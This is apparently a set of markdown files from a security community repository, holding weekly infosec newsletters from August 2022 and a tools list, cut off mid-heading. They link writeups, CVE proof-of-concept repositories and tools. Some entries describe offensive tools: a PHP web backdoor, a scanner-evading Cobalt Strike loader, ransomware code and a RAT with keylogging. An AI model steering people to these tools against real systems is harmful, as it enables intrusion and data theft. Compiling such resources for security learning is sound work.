"ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Readme.md", "content": "\n" }, { "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Tools/Readme.md", "content": "## Weekly Cybersecurity 01 : v0.2\n**Date : 2nd - 23rd Aug 2022\n\n\n\n### Projects, Tools, RAT's And Ransomeware **\n*Misc Tools :*\n- List of Blackhat arsenal tool(since its inception in 2011) - https://github.com/toolswatch/blackhat-arsenal-tools\n\n*OSINT TOOLS :*\n- [Yagooglesearch(Yet Another Google Seatch #python library) : \"Simulates real human Google search behavior to prevent rate limiting by Google and if HTTP 429 blocked by google](https://github.com/opsdisk/yagooglesearch)\n- Quick manual for Yagooglesearch - https://graph.org/Yagooglesearch-08-17 \n- [PyTrends : Simple #python library for automatically collecting data from Google Trends.For example, you can find out what queries users enter with a certain keyword(including historical and regional data)](https://github.com/GeneralMills/pytrends)\n- [Email-header-analyzer](https://github.com/cyberdefenders/email-header-analyzer)\n- [Search Patterns - tool that analyzes autosuggest for #Google and #YouTube search queries (questions, prepositions, comparisons, and words starting with different letters of the alphabet).The data can be viewed as a graph or list.](https://chrome.google.com/webstore/detail/search-patterns/hjlahhonnlceifaecpjejlhhgjkipnbj/related?hl=zh-CN&gl=001)\n\n*SAAS/PASS/Recon/VA/Pentesting/Exploit Web :*\n- [Pentesting Reporting Tool](https://reconshell.com/pentesting-reporting-tool/)\n- [Lazyparam - A simple automation tool to detect LFI, RCE, and SSTI vulnerability](https://github.com/aniqfakhrul/lazyParam)\n- [FindFrontableDomains : Search for potential frontable domains.Based on information found here: https://www.bamsoftware.com/papers/fronting/](https://github.com/rvrsh3ll/FindFrontableDomains)\n- [goSqlite_gorm - golang,Penetration, Attack, Auxiliary Tool, tnb = tree new bee](https://github.com/hktalent/goSqlite_gorm)\n- [Serein_Linux - 【Lazy Artifact】A graphical tool that collects urls in batches, and performs various nday detections on the collected urls in batches. It can be used for src mining, cnvd mining, 0day exploitation, building your own arsenal and other scenarios.](https://github.com/W01fh4cker/Serein_Linux)\n- [HiPHP - BackDoor to control php-based sites. : A BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the HIPHP_HOLE_CODE and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.](https://github.com/yasserbdj96/hiphp)\n\n- [Black-Dragon-An Advanced Automation Tool For Web-Recon Developed For Linux Systems.](https://github.com/Cyber-Guy1/BlackDragon)\n- [Frogy - Subdomain enumeration script. It's unique in the way it is built upon.](https://github.com/iamthefrogy/frogy)\n- [SQLiDetector - Simple python script that helps you to detect SQL injection \"Error based\" by sending multiple requests with 9 payloads and checking for 152 regex patterns for different databases.](https://github.com/eslam3kl/SQLiDetector)\n- [sectools - Offensive Security Python Toolbox - A Python native library containing lots of useful functions to write efficient scripts to hack stuff.](https://github.com/p0dalirius/sectools)\n- [Smersh - A pentest oriented collaborative tool used to track the progress of your company's missions and generate rapport.](https://github.com/CMEPW/Smersh)\n- [CirrusGo - A fast tool to scan SAAS, PAAS App written in Go](https://github.com/Ph33rr/cirrusgo)\n- [Geopipe tool to take domains from stdin and output to stdout if have at least one IP address associated with the selected country.](https://gitlab.com/lu-ka/geopipe)\n- [EMBA Firmware analyzer version 1.1.0 aka Las Vegas Edt. is out now - a lot of new features including system emulation environment, status bar and Ubuntu support](https://github.com/e-m-b-a/emba/releases/tag/1.1.0-Las-Vegas-Edt)\n- [SCMKit v1 - Source Code Management Attack Toolkit ](https://github.com/xforcered/SCMKit).\n\n*Cloud Seccurity :*\n- [Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn them on.](https://github.com/awslabs/assisted-log-enabler-for-aws)\n\n*Blue Team Techniques :* \n- [BlueHound - open-source tool that helps blue teams pinpoint the security issues that actually matter](https://github.com/zeronetworks/BlueHound\n- [Matos : An open-source cloud security tool for analyzing multi-cloud infrastructure security.](https://github.com/cloudmatos/Matos\n- [Siembol : An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework. Siembol provides a scalable, advanced security analytics framework based on open-source big data technologies. Siembol normalizes, enriches, and alerts on data from various sources, which allows security teams to respond to attacks before they become incidents. ](https://github.com/G-Research/siembol)\n- [Sauron is a minimalistic cross-platform malware scanner with non-blocking realtime filesystem monitoring using YARA rules, written in Rust.](https://github.com/evilsocket/sauron)\n\n*Active Directory/IR :*\n- [ADEnum - find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.](https://github.com/SecuProject/ADenum)\n- [VolatileDataCollector : During my Incident Response engagements, dumping volatile data](https://github.com/gtworek/VolatileDataCollector)\n- [AzurePolicyTestFramework-A CLI tool to test Azure Policy relying on Terraform + Golang](https://github.com/microsoft/AzurePolicyTestFramework)\n- [Jazzer - Coverage-guided, in-process fuzzing for the JVM](https://github.com/CodeIntelligenceTesting/jazzer)\n- [dc-sonar - Analyzing AD domains for security risks related to user accounts](https://github.com/ST1LLY/dc-sonar)\n\n*Advance tools/Framework to make hackers life easier :*\n- Cobalt Strike \n- Metasploit\n- BurpSuite Pro \n- HCL APP SCAN,\n- Nussus\n- Spunk Etc.\n\n*Advance threat & Malware Analysis Tools :*\n- [AceLdr - Avoid Memory Scanners: A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect.](https://github.com/kyleavery/AceLdr)\n- [PortEx : Java library for static malware analysis of Portable Executable files](https://github.com/struppigel/PortEx)\n\n*Cryptography :*\n- [Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers](https://github.com/google/paranoid_crypto)\n- [MD5 Length Extension Attack based on- https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://joakim.uddholm.com/posts/md5-length-extension-attack)\n\n*Defender - RAT/Ransomware :*\n- [Develop your own RAT - EDR + AV Defense. ppt : (https://docs.google.com/presentation/d/1UZmFo_TvSS2TvPJKlDjIW1kTVjYGGaYO86Buh2UgbaI/mobilepresent#slide=id.g11cdb36f978_1_366)](https://github.com/dobin/antnium)\n- [Lockbit3.0 Microsoft Defender MpClient.dll DLL Hijacking PoC.](https://github.com/Sh0ckFR/Lockbit3.0-MpClient-Defender-PoC)\n\n*Poweshell :*\n- [Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines](https://github.com/last-byte/PersistenceSniper/)\n- [CreateProcess - A small PoC that creates processes in Windows](https://github.com/helpsystems/CreateProcess)\n[Creating Processes Using System Calls:](https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls)\n\n*Projects/Personal :*\n- [Simple ransomware implementation in python for educational purposes ](https://github.com/dubniczky/Ransomware)\n- [USB Rubber Ducky type scripts written for the digiSpark](https://github.com/Mohit0/DigiSpark-Scripts)\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md", "content": "# Weekly Cybersecurity update 00: v0.1\nIdea is to give back to community and save time(because time is valuable) with HIGH QUALITY CYBERSECURITY UPDATES.\nThis is a trail version. \n\nLast Issue date : 2 Aug 2022 : 7:00 AM IST \n\n*Current Issue date : 9 Aug 2022 : 7:00 AM* IST\n\nNext Issue date : 16 Aug 2022 : 7:00 AM IST\n \n#### Give Back to Community - [If you like the work please support us ❣️ by contributing and joining]\n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n- Contributors : - Vikram.\n\n#### Hey Hackers, Here are the Agenda for this Week(2- 9 Aug 2022): \n- **1. Hiring, challenge & Free course**\n- **2. Events, Talks & Webinars**\n- **3. Cve's POC and analysis**\n- **4. Vulenrabilty/bugs Writeups**\n- **5. Hackerone Reports**\n- **6. Research, Whitepaper & Statistics Reports**\n- **7. Twitter thread**\n- **8. Tools, rat's and Ransomware**\n- **9. More update on Secuirty: SOC, CISA Bulletin, Ransomeware etc**\n\n----------------------------------------------------------------------------------\n\n**Jobs Opening**\n\n- [netsec's Q3 2022 Information Security Hiring Thread](https://www.reddit.com/r/netsec/comments/w25lkc/rnetsecs_q3_2022_information_security_hiring/)\n\n**Vulenrabilty/bugs Writeups**\n\n- [Description: MyBB 0day Authenticated Remote code execution.](https://0x1337.ninja/2022/07/19/mybb-0day-authenticated-remote-code-execution/)\n\n- [AWS cloud security and Misconfigurations](https://dhiyaneshgeek.github.io/cloud/security/2022/06/23/aws-misconfigurations/)\n\n- [The Miracle Exploit because it affects many products based on Oracle Fusion Middleware and Oracle online systems. Miracle means Middleware Fusion with Oracle](https://peterjson.medium.com/miracle-one-vulnerability-to-rule-them-all-c3aed9edeea2)\n\n- [XSS vulnerabilities in Google Cloud, Google Play could lead to account hijacks](https://portswigger.net/daily-swig/xss-vulnerabilities-in-google-cloud-google-play-could-lead-to-account-hijacks)\n\n- [Gsuite Domain takeover through delegation](https://infosecwriteups.com/gsuite-domain-takeover-through-delegation-9d6664c91142)\n\n- [Careful Who You Colab With:abusing google colaboratory](https://medium.com/mlearning-ai/careful-who-you-colab-with-fa8001f933e7)\n\n- [Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP](https://medium.com/@numanturle/microsoft-teams-stored-xss-bypass-csp-8b4a7f5fccbf)\n\n- [Description: SSRF and Account Takeover via XSS in ERPNext.](https://tech-blog.cymetrics.io/en/posts/huli/erpnext-ssrf-and-xss-to-account-takeover/)\n\n- [CQ, a code security scanner - ](https://github.com/chris-anley/cq)\n\n- [Awesome-RCE-techniques : RCE](https://github.com/p0dalirius/Awesome-RCE-techniques)\n\n- [IDOR - Broken Authentication](https://redmethod.hashnode.dev/idor-broken-authentication?s=09)\n\n- [Admin account takeover via weird Password Reset Functionality](https://0xmahmoudjo0.medium.com/admin-account-takeover-via-weird-password-reset-functionality-166ce90b1e58)\n\n- [PII Disclosure of Apple Users ($10k)](https://ahmdhalabi.medium.com/pii-disclosure-of-apple-users-10k-d1e3d29bae36)\n\n\n**Twitter thread**\n\n- @LazySaad explained how to find IDORs and how we can use user_id to verify if the IDOR exists or not.\nhttps://twitter.com/LazySaad/status/1538664657749266433?s=20&t=FDeNgK3zKzJ4EhiTU8H3Pg\n\n- @tabaahi_ explains how beginners can look for open redirects, what tools to use, how to go about finding them and where one should report open redirects. Check it out here. It’s a great starting point for newbies in Infosec.\nhttps://twitter.com/tabaahi_/status/1539159408026218496?t=mF-ote2xiy0kFuvVgHjwTA&s=19\n\n- A great thread from Hossein NafisiAsl where he explains how an HTTP Request smuggling turns into mass account takeover and shares a great GitHub repository where he collected amazing write-ups & tips.\nhttps://twitter.com/MeAsHacker_HNA/status/1538862575617814528?t=YitdeDYSt2_fdJTWiK_qmA&s=19\n\n- Guide on source code review skills from the beginning? @Ananda Dhakal’s twitter thread:(https://twitter.com/dhakal_ananda/status/1544574015779606529?t=kb-B5IJfENymNZb7sLgnHw&s=19)\n\n\n**Hackerone reports**\n\n- [DROPBOX - Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation $4,913](https://saynsec.medium.com/mail-server-misconfiguration-leads-to-sending-a-fax-from-anyones-account-on-hellofax-dropbox-bbp-aab3d97ab4e7)\n\n- [Race condition in faucet when using starport $5,000](https://blog.credshields.com/race-condition-in-tendermints-starport-7cebe176d935)\n\n- [Possible to make restricted files public on Phabricator via Diffusion$2,000](https://hackerone.com/reports/1560717)\n\n**CVE's**\n\n- [fanweiOA #rce POC](https://github.com/xiaoheihei741/fanweiOA-rce-poc)\n\n CVE-2022-26712: The POC for SIP-Bypass Is Even Tweetable\n\n- I found some new attack surfaces in the macOS PackageKit.framework, and successfully disclosed 15+ critical SIP-Bypass vulnerabilities. Apple has addressed 12 of them with CVE assigned so far. There are still some reports in the Apple’s processing queue. All of them are interesting logic issues, and of course each has a successful exploit demonstration.\n\n Here, CVE-2022-26712 is a very simple one, which was patched in macOS 12.4. However, I found another way to exploit it again, finally Apple addressed it as CVE-2022-32826 in macOS 12.5.\n\n https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable\n\n- CVE-2022-26138 : Confluence Hardcoded Password PoC\n\n https://github.com/z92g/CVE-2022-26138\n\n- wget-root exploit\n https://github.com/CopernicusPY/wget-root\n\n- CVE-2022-32744: \n Critical Samba admin password reset flaw\n https://securityonline.info/cve-2022-32744-critical-samba-admin-password-reset-flaw/\n\n- CVE-2022-0441 (2022-03-07)\n The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin\n\n https://github.com/biulove0x/CVE-2022-0441\n\n- CVE-2022-0529 (2022-02-09)\n A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.\n\n https://github.com/nanaao/unzip_poc\n https://github.com/ByteHackr/unzip_poc\n\n------------------------------------------\n**More update on Secuirty**\n\n- CISA - Bulletin (SB22-206)\n Vulnerability Summary for the Week of July 18, 2022\n https://www.cisa.gov/uscert/ncas/bulletins/sb22-206\n\n- SOC: Weekend Wrap-Up\n https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up\n\n- This is collections of APT and cybercriminals campaign.(Updated on regular basis)\n https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections\n\n- Security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and NBIoT chipsets. \n https://corp.mediatek.com/product-security-bulletin/August-2022\n\n**Videoes :**\n- 60 Remote Code Execution in 60 minutes (Youtube video)- Laluka\n https://www.youtube.com/watch?v=Z9GN6cuggYQ\n \n- The Real World Of Cyber Security | Cyber Security talk with Sainath Volam \n https://www.youtube.com/watch?v=GG3aCxIw-2M\n\n- Cheakout Tib3rius Mentorig Monday : \n https://www.youtube.com/c/Tib3rius/videos\n \n------------------------------------------\n**Tools**\n\n- SSTImap - Automatic SSTI detection tool with interactive interface\n SSTImap was developed as a new SSTI detection tool based on Tplmap.The main feature of this tool and \n a key difference with Tplmap is the interactive mode, which enhances detection and exploitation.Also, \n payload for Smarty was changed to work without {{php}}{{/php}} tag, which was disabled by default in \n Smarty 3.0.New payloads for other template engines will be developed.\n\n https://github.com/vladko312/SSTImap\n\n- GPSJam \n GPS Interfence Map shows where GPS jamming systems could be operating on a particular day \n (most often associated with military conflicts).\n Data source: ADS-B Exchange API.\n http://gpsjam.org\n\n- PurplePanda\n\n This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify \n privilege escalation paths and dangerous permissions in the cloud/saas configurations. \n Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.\n The name comes from the animal Red Panda. This panda eats peas, just like Purple Panda, which can ingest API keys/tokens\n found by these PEASS. The color was changed to purple because this tool is meant mainly for Purple Teams \n (because it can be highly useful for both Blue and Red Teams).\n\n https://github.com/carlospolop/PurplePanda\n\n\n- Quasar #RAT remote\n\n Free, Open-Source Remote Administration Tool for Windows\n\n Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.\n\n Features:\n▫️ TCP network stream (IPv4 & IPv6 support)\n▫️ Fast network serialization (Protocol Buffers)\n▫️ Compressed (QuickLZ) & Encrypted (TLS) communication\n▫️ UPnP Support\n▫️ Task Manager\n▫️ File Manager\n▫️ Startup Manager\n▫️ Remote Desktop\n▫️ Remote Shell\n▫️ Remote Execution\n▫️ System Information\n▫️ Registry Editor\n▫️ System Power Commands (Restart, Shutdown, Standby)\n▫️ Keylogger (Unicode Support)\n▫️ Reverse Proxy (SOCKS5)\n▫️ Password Recovery (Common Browsers and FTP Clients)\n ... and many more!\n\n https://github.com/quasar/Quasar\n\n\n- Reverse Image Search Engine\n http://immerse.zone\n\n Search by uploaded image or URl;\n Search by sketch (it can be drawn directly in the browser)\n Search by quote (can be selected from the catalog)\n\n (but unfortunately, the search results are not yet very accurate)\n\n**SOURCES:** \n AppSecEzine #441\n InfoSec Writeups Weekly #14\n Hackerone\n CISA\nopalsec\nTwitter/reddit\nTelegram private group\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md", "content": "## v0.2 Weekly Cybersecurity 01 \n\n **Current Issue date : 9th August 2022 : 7:00am**\n \n Last Issue date : 2 Aug 2022 : 7:00 AM\n Next Issue date : 16 Aug 2022 : 7:00 AM\n \n#### Give Back to Community - [If you like the work please support us ❣️ by contributing and joining]\n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n- Contributors : - Vikram.\n\n#### Hey Hackers, Here are the Agenda for this Week(2- 9 Aug 2022): \n- **1. Hiring, challenge & Free course**\n- **2. Events, Talks & Webinars**\n- **3. Cve's POC and analysis**\n- **4. Vulenrabilty/bugs Writeups**\n- **5. Hackerone Reports**\n- **6. Research, Whitepaper & Statistics Reports**\n- **7. Twitter thread**\n- **8. Tools, rat's and Ransomware**\n- **9. More update on Secuirty: SOC, CISA Bulletin, Ransomeware etc**\n\n-------------------------------------------------------------------------------------------------\n\n### Hiring, challenge & Free course**\n- [Hiring Week01 : 2- 9 Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022)\n\n- [Microsoft certified Fundamentals - Exam PAID](https://docs.microsoft.com/en-us/certifications/fundamentals?wt.mc_id=fundamentals_linkedin_organicsocial_wwl)\n\n- \"Windows Kernel Debugging, Internals, and Exploitation\" Pre-Class Survey - Beta.\n \n [Cedric Halbronn has created this class to show how you can exploit vulnerabilities in the Windows kernel.](https://docs.google.com/forms/d/e/1FAIpQLScojZa4zQmlAO5365EYp8gGcd7npMtk9YyxVh7MG1jrUp7mNQ/viewform)\n\n### **Events, Talks, podcast & Webinars**\n\n- [What We're Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022](https://www.rapid7.com/blog/post/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/)\n- [cloudsec 2022 Conference Talk Recordings](https://youtube.com/playlist?list=PLCPCP1pNWD7N2SPaz4cmuS27xutaf32jy)\n- [Upcomming Conferences and events](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n\n### **CVE's POC and analysis**\n\n - [CVE's Overview -> 2 - 9 Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) \n \n - CVE Hunting Tips #001 - https://medium.themayor.tech/bug-bounty-tips-001-17879af4509f \n \n\n### **Vulenrabilty/bugbounty Writeups**\n\n- [ F5 has released its quarterly security notification for August 2022, which informs customers about 21 vulnerabilities affecting BIG-IP and other products.](https://support.f5.com/csp/article/K14649763)\n- [\"use after return\" Bug feature and how “higher-level” programming languages(C, Go, and Rust) can guard against this behavior.](https://danielmangum.com/posts/risc-v-bytes-stack-use-after-return/)\n- [how i got a 10-000 penetration testing project job with bugbounty](https://junoonbro.medium.com/how-i-got-a-10-000-penetration-testing-project-job-with-bug-bounty-b38ab4357ce4)\n- [XSS in Gmail's Amp4Email](https://www.adico.me/post/xss-in-gmail-s-amp4email)\n- [QNAP Poisoned XML Command Injection - Silently Patched](https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/)\n- [Hijacking email with Cloudflare Email Routing](https://albertpedersen.com/blog/hijacking-email-with-cloudflare-email-routing/)\n- [Stored XSS to account takeover going beyond Document Cookie](https://medium.com/@smhtahsin33/stored-xss-to-account-takeover-going-beyond-document-cookie-970e42362f43)\n- [Hackerone 6000+ Sheets Vulnerability List](https://docs.google.com/spreadsheets/d/1mfj6InLiXaKvemRimH1wowP4UTe_HExemGajId_JRD8/edit?usp=drivesdk)\n- [How do i test for web cache vulnerabilities +tops and tricks](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)\n- [Web Application Reconnaissance Guide, Cybersec | Shubham Dhungana](https://shubhdhungana.medium.com/web-application-reconnaissance-guide-cybersec-shubham-dhungana-17858c967e2b)\n- [How we have pwned Root-Me in 2022.](https://spawnzii.github.io/posts/2022/07/how-we-have-pwned-root-me-in-2022/)\n- [The Mobile Attack Surface : Common issues facing Android applications as well as how individuals/organizations can begin to understand and measure the security level of their applications.](https://engineering.mercari.com/en/blog/entry/20220729-the-mobile-attack-surface/)\n- [ZOHO (Before 10.0.662) ManageEngine Desktop Central – SQL Injection / Arbitrary File Write](https://labs.jumpsec.com/zoho-manage-engine-desktop-central-sql-injection-arbitrary-file-write/)\n- [Phishers Bounce Lures Off Unprotected Snapchat, Amex Sites](https://www.inky.com/en/blog/phishers-bounce-lures-off-unprotected-snapchat-amex-sites)\n\n### **Hackerone repots**\n\n- [$10,000 : One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com](https://hackerone.com/reports/1567186)\n- [$50,00 IDOR vulnerability: Getting access of mod logs from any public or restricted subreddit](https://hackerone.com/reports/1658418)\n- [$2500 Privielage Escalation : Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token](https://hackerone.com/reports/1382919)\n- [$1500 Improper Restriction of Authentication Attempts: Brute Force of fabric-ca server admin account](https://hackerone.com/reports/411364) \n- [$500 DOS : Enrolling to a CA that returns an empty response crashes the node process](https://hackerone.com/reports/506412)\n\n### **Research ,Analysis, Whitepaper & Statistics Reports**\n- [Edgescan- 2022 Vulnerabilty stastics report](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n- [Top trends Application Aecurity in 2022](https://www.tripwire.com/state-of-security/devsecops/top-trends-application-security/)\n- [Determining Malicious Probabilities Through **ASNs**](https://www.akamai.com/blog/security/determining-malicious-probabilities-through-asns)\n- [HAcking together an ASM platform using projectdiscovery tools/](https://blog.projectdiscovery.io/asm-platform-using-projectdiscovery-tools/)\n- [Asset discovery on public bug bounty programs](https://github.com/trickest/inventory)\n- [Everything you need to know about hash length extension attacks. : Old but still have the charm](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)\n- [Elastic Open Sources Their Endpoint Security Protection YARA Ruleset](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security)\n- [LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool](https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool)\n- [Inside Windows Defender System Guard Runtime Monitor](https://blog.syscall.party/2022/08/02/inside-windows-defender-system-guard-runtime-monitor)\n- [how leaked twitter api keys can be used to build a bot army/](https://cloudsek.com/whitepapers_reports/how-leaked-twitter-api-keys-can-be-used-to-build-a-bot-army/)\n- [New Era of Phishing Payloads After The Deprecation of Macros](https://fourcore.io/blogs/modern-initial-access-vector-macro-depreciation)\n- [How paswordless works ?](https://goteleport.com/blog/how-passwordless-works/)\n- [Discover an AntiDebug feature: a newbie approach](https://s1ckb017.github.io/2022/07/30/Discover-an-AntiDebug-feature-a-newbie-approach.html)\n\n### **Twitter thread**\n\n- A massive widespread malware attack on Github. Over 35k repositories are infected. - https://twitter.com/stephenlacy/status/1554697077430505473?s=20&t=7z_cL3390oiD_sx5WA2AYw\n- Widespread Solana private key compromise - https://twitter.com/0xfoobar/status/1554627762807349249?t=OZAESu9ySlHBPwgTMBju7w&s=08\n\n### **Projects, Tools, RAT's And Ransomeware **\n- [Black-Dragon-An Advanced Automation Tool For Web-Recon Developed For Linux Systems.](https://github.com/Cyber-Guy1/BlackDragon)\n- [SQLiDetector - Simple python script that helps you to detect SQL injection \"Error based\" by sending multiple requests with 9 payloads and checking for 152 regex patterns for different databases.](https://github.com/eslam3kl/SQLiDetector)\n- [sectools - Offensive Security Python Toolbox - A Python native library containing lots of useful functions to write efficient scripts to hack stuff.](https://github.com/p0dalirius/sectools)\n\n- [Smersh - A pentest oriented collaborative tool used to track the progress of your company's missions and generate rapport.](https://github.com/CMEPW/Smersh)\n- [CirrusGo - A fast tool to scan SAAS, PAAS App written in Go](https://github.com/Ph33rr/cirrusgo)\n- [semgrep - static source code analyzer which works on 20+ languages.](https://semgrep.dev/docs/getting-started/)\n\n- [Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers](https://github.com/google/paranoid_crypto)\n- [MD5 Length Extension Attack based on- https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://joakim.uddholm.com/posts/md5-length-extension-attack)\n\n- [Simple ransomware implementation in python for educational purposes ](https://github.com/dubniczky/Ransomware)\n- [USB Rubber Ducky type scripts written for the digiSpark](https://github.com/Mohit0/DigiSpark-Scripts)\n\n- [Develop your own RAT - EDR + AV Defense. ppt : (https://docs.google.com/presentation/d/1UZmFo_TvSS2TvPJKlDjIW1kTVjYGGaYO86Buh2UgbaI/mobilepresent#slide=id.g11cdb36f978_1_366)](https://github.com/dobin/antnium)\n- [Lockbit3.0 Microsoft Defender MpClient.dll DLL Hijacking PoC.](https://github.com/Sh0ckFR/Lockbit3.0-MpClient-Defender-PoC)\n\n- [For More ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Tools/Readme.md)\n\n### **More update on Secuirty and future: SOC, CISA Bulletin, Ransomware etc**(Outdated)\n - [The Future of the SOC Is XDR](https://www.rapid7.com/blog/post/2022/08/03/the-future-of-the-soc-is-xdr/)\n - [CISA - Bulletin (SB22-213) - Vulnerability Summary for the Week of July 25, 2022](https://www.cisa.gov/uscert/ncas/bulletins/sb22-213)\n - CTF Events] - (https://ctftime.org/event/list/)\n \n - [Private pentesting Reports](https://github.com/juliocesarfort/public-pentesting-reports)\n - [MalwareApiLibrary - Сollection of apis used for malware development:StringManagementLib & WinApiManagementLib](https://github.com/MalwareApiLib/MalwareApiLibrary)\n - [Awsome Threat intelligence](https://github.com/hslatman/awesome-threat-intelligence)\n - [Awesome-Red-Teaming](https://github.com/0xMrNiko/Awesome-Red-Teaming)\n - [Red Team infastructure VM](https://github.com/chipmanfu/RGI-redteam-scripts)\n - [Red Team cheatsheet](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets) \n - [Awesome CobaltStrike](https://github.com/zer0yu/Awesome-CobaltStrike) \n - [BloodHound - uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.](https://github.com/BloodHoundAD/BloodHound)\n - [Introducing BloodHound 4.2 — The Azure Refactor](https://posts.specterops.io/1cff734938bd\n - [Active Directory Enumeration: BloodHoud](https://www.hackingarticles.in/active-directory-enumeration-bloodhound/)\n - [Active direcctory Basics : PART 1, 2, 3, 4.](https://rootdse.org/posts/active-directory-basics-1/)\n \n### SOURCES :\nhttps://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md\n\n\n### Volunteer Opportunities :\n\n If you want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n Contact @Attr1b on Telegram and\n Please write a reason How do you plan to improve it?\n\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md", "content": "## Weekly infosec Update 02 \n\n **Issue date : 16th August 2022 : 7:00am**\n \n Last Issue date : 2nd Aug 2022 : 7:00 AM\n Next Issue date : 22nd Aug 2022 : 7:00 AM\n \n#### Give Back to Community - [If you like the work please support us ❣️ by contributing and joining]\n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n- Contributors : - Vikram, Paul Miller\n\n#### Hey Hackers, Here are the Agenda for this Week(9 - 16 Aug 2022): \n- **1. Hiring & Free course**\n- **2. Events, Talks & Webinars**\n- **3. Cve's POC and analysis**\n - *CVE's Week 02-> 9 - 16 Aug 2022* \n- **4. Vulenrabilty/bugs Writeups**\n - *Hackerone Report Segment:*\n - *Bugs Analysis and writeups segment:* \n- **5. Research Article/Whitepaper & Statistics Reports**\n- **6. Twitter thread**\n- **7. Tools, rat's and Ransomware**\n- **8. Red Team Resources**\n- **9. Secuirty & Researchers: Pentesting, SOC, Red team, Blue team, threat intelligance, Ransomeware etc**\n\n-------------------------------------------------------------------------------------------------\n\n### Hiring & Free course**\n- [Hiring Week01 : Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022)\n\n- FedTAFE is offering free self-paced CCNA right now. Offer expires on the 17th. - https://forms.office.com/r/AGMJmJMk3x\n- Free Api Security course by - https://university.apisec.ai/\n\n### Events, Talks & Webinars**\n\n - [Blackhat 2022 recap - cloud, eBPF, global conflicts, supply chain, and more](https://sysdig.com/blog/blackhat-2022-recap/)\n - [BlackHat 2022 all PAID Trainings schedule](https://www.blackhat.com/tr-22/training/schedule/index.html)\n - [Black Hat USA Demoes that include silver ticket with password, S4U2Self, UAC bypass etc](https://github.com/tyranid/blackhat-usa-2022-demo)\n - [Defcon 2022 video & slides]( https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/)\n - [Offensive Security Penetration Testing with Kali Linux [PEN-200] ongoing live classes 2022 ]( https://www.youtube.com/channel/UCqrnQLyFW8NpCZ1YF5-VrZQ/videos)\n - [Bug Bounty 101: #20 — Rapidly Testing APIs for Broken Access Control by Z-winK.](https://www.youtube.com/watch?v=qvbNVRqbYLE)\n - [Speakers lineup THREAT CON 2022](https://threatcon.io/agenda)\n\n### Cve's POC and 